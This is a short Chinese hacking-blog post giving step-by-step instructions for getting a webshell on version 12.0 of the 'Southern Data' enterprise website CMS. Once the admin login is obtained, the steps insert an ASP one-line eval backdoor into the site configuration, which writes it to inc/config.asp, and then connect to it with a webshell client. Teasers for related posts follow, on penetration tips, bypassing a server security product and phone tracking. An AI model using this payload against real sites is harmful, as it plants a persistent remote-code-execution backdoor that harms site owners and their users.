南方数据企业网站管理系统12.0拿SHELL ***

hacker5年前黑客文章727

南方数据企业网站管理系统12.0插配置文件拿SHELL

在我们拿到南方数据企业管理系统后台账号密码后,可以使用下面的 *** 来拿shell

进入后台后 点击系统管理 网站配置

随便找个地方修改成

“%><%eval request(“qxz”)%><%Const nidaye=”xzlbb.com

然后用一句话客户端连接http://目标网站/inc/config.asp就OK了!

标签: 黑客技术

相关文章

网站渗透思路全方面总结

针对新手写一点渗透的小思路、小技巧,主要讲的是思路,所有不会太详细。 经常逛一些好的博客或者门户站,坚持下来,每天学一点思路,你会积累到很多东西,记住:技术需要时间沉淀。 (一)针对网...

网络黑客们最常见哪几种漏洞扫描工具?

网络黑客们最常见哪几种漏洞扫描工具?

我已经写过许多网络黑客方法了,假如你认真学,也可以把握一些了。可是有的新手便会问了,我怎样发觉网址有了你常说的系统漏洞,我怎样应用这种方法?这一就需要采用扫描枪了。   扫描枪是一类自动识...

绕过安全狗用户限制提权

绕过安全狗用户限制提权

简要描述: 你还在为有安全狗而不能添加用户而烦恼么?那快来看~只需三步,在最新服务器安全狗4.0.05221账号保护全开的状态下,我是如何用guest获取登陆权限的.前提是要有提权exp哦...

Cisco环境解决ARP欺骗问题

因为经常看到网上有看到求助ARP病毒防范办法,其实ARP欺骗原理简单,利用的是ARP协议的一个“缺陷”,免费ARP来达到欺骗主机上面的网关的ARP表项。 其实免费ARP当时设计出来是为了2个作用的...

cURLCyber随意吗?

cURLCyber随意吗?

什么叫cURL Cyber? Curl是一个命令行工具,作为应用URL英语的语法传送数据的库。该专用工具适用多种多样协议书,包含但不限于:FILE,DICT,FTP,FTPS,HTTP,HTTPS,...

黑客定位手机位置,别小瞧这些小细节

黑客便是假借黑客名义操控别人电脑的黑客技能,咱们都知道手机有定位功能,但咱们并不知道如何定位手机号码,那么今日黑客教你定位手机号码以及手机号码定位软件下载。 只是经过一个手机号,就能够精确认位出你的...